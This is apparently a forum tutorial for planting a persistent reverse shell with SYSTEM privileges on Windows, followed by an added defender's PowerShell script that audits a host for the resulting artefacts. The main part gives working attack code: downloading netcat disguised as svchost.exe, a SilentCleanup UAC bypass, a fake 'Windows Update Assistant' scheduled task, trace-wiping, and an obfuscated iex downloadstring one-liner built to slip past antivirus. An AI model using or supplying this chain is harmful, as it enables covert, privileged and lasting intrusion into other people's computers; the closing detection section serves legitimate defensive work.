Persistent reverse shell with NT Authority\SYSTEM privileges in 3 seconds


nyshone

So how do we create such reverse shell?
 
Well, first of all you need to download netcat 1.12 and extract nc64.exe. Once you've got it extracted, upload it to some file-hosting service of your choice which provides a DIRECT LINK (very important!!). I used Discord, works like a charm and the link doesn't expire.
 
Second, you need to make yourself an .XML file, which you're gonna need later for Task Scheduler. I believe scheduled tasks are a really good way to set up persistence, as well as escalating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments at the bottom to your IP/PORT. Once you've got that done, save it and upload it for a DIRECT LINK, just like you uploaded your previous file.
 
Now that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell:
cd $env:public
$url1="YOUR_NC64_LINK"
$url2="YOUR_XML_LINK"
$path1="$env:public\svchost.exe"
$path2="$env:public\x.xml"
(new-object net.webclient).downloadfile($url1,$path1)
(new-object net.webclient).downloadfile($url2,$path2)
cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml'

 

So first, it downloads both of your files via PowerShell, then it clears your Windows + R history to remove any traces of itself (if you're using a USB Rubber Ducky). Then it uses this UAC bypass technique to create a scheduled task called Windows Update Assistant, which is set to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file, which is now called svchost.exe, as a hidden system file, and then it deletes our .XML file, since the system doesn't need it anymore after the task is created.
 
Now you're probably thinking: this is all nice, but how the fk do I run this in one line of code?
Very simple, by invoking the DownloadString method in PowerShell like this:
powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')"

 

But the problem with this one-liner is that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit:
cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))"

 

And there it is, this one-liner will get you a persistent reverse shell which will check every minute whether it's running and, if it's not, executes itself silently in the background.
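A host-side audit for the artefacts this chain leaves behind (the task name, the HKCU\Environment windir value the SilentCleanup bypass depends on, and the hidden svchost.exe dropped in %PUBLIC%), added here as a defender's example and not part of nyshone's post. It assumes an elevated PowerShell 5.1+ session on a host with the ScheduledTasks module; the task name and drop path are taken from the post above.

```powershell
# Added example: audit a Windows host for the persistence artefacts described in the post.
# Assumes an elevated PowerShell 5.1+ session; indicator names come from the post, not from any vendor source.
function Find-SilentCleanupPersistence {
    $findings = @()

    # 1. The scheduled task created by the chain, plus any task that runs as SYSTEM
    #    but executes a binary from the user-writable %PUBLIC% folder.
    foreach ($t in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $runsAsSystem = [string]$t.Principal.UserId -match 'SYSTEM$'
        foreach ($a in $t.Actions) {
            $exe = [string]$a.Execute
            if ($t.TaskName -eq 'Windows Update Assistant' -or
                ($runsAsSystem -and $exe -match [regex]::Escape($env:PUBLIC))) {
                $findings += "Task '$($t.TaskPath)$($t.TaskName)' runs '$exe $($a.Arguments)' as '$($t.Principal.UserId)'"
            }
        }
    }

    # 2. SilentCleanup UAC-bypass residue: a user-controlled 'windir' under HKCU\Environment.
    #    The chain deletes it again, so finding it means a run that was interrupted or is in progress.
    $envKey = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
    if ($envKey -and $envKey.PSObject.Properties['windir']) {
        $findings += "HKCU\Environment\windir is set to '$($envKey.windir)' (legitimate windir lives under HKLM, not HKCU)"
    }

    # 3. Dropped files: a hidden+system 'svchost.exe' outside System32 and a leftover task XML.
    #    -Force makes Get-ChildItem return hidden and system files.
    $dropped = Get-ChildItem -Path $env:PUBLIC -Include 'svchost.exe', 'x.xml' -Recurse -Force -File -ErrorAction SilentlyContinue
    foreach ($f in $dropped) {
        $hash = (Get-FileHash -Path $f.FullName -Algorithm SHA256).Hash
        $line = "File $($f.FullName) attrs=[$($f.Attributes)] sha256=$hash"
        if ($f.Extension -eq '.exe') {
            # The real svchost.exe carries a valid Microsoft signature; a renamed netcat does not.
            $sig = Get-AuthenticodeSignature -FilePath $f.FullName
            $line += " signature=$($sig.Status)"
        }
        $findings += $line
    }

    return $findings
}

$results = Find-SilentCleanupPersistence
if ($results.Count -eq 0) { 'No indicators from this persistence chain found.' }
else { $results | ForEach-Object { "[!] $_" } }
```

For detection at creation time rather than after the fact, Security event 4698 (scheduled task created) and a Sysmon registry rule on HKCU\Environment\windir cover steps 1 and 2 of this chain.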
